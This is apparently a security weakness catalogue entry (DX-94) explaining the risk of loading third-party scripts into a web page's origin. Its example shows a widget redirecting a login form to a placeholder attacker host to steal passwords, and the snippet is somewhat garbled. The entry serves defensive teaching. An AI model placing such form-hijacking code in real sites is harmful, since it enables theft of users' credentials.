Inclusion of Web Functionality from an Untrusted Source
This vulnerability occurs when a web application directly imports and executes functionality, like a widget or script, from an external, untrusted domain. Because the imported code runs within your application's own security context (origin), it gains the same level of access to user data and the DOM as your own code, potentially giving the third party full control.
Incorporating third-party web functionality, such as JavaScript widgets or analytics scripts, is a common practice but introduces significant risk. The core issue is that code loaded via tags like `<script src="http://untrusted-source.com">` executes with the same privileges as your own application. This means the external code can read sensitive data like user cookies, session tokens, and the entire DOM, effectively bypassing the browser's same-origin policy for your site. Even if you trust the source provider, your application remains vulnerable if that provider's infrastructure is compromised or if the code is altered during delivery (a supply-chain attack). Developers might not always be fully aware of all the external dependencies their application relies on, making this a subtle but widespread issue in modern web mashups and integrated services.
Impact: Execute Unauthorized Code or Commands
ID : DX-94
This login webpage includes a weather widget from an external website:Code Example:
htmlCode Example:
...Weather widget code....* document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";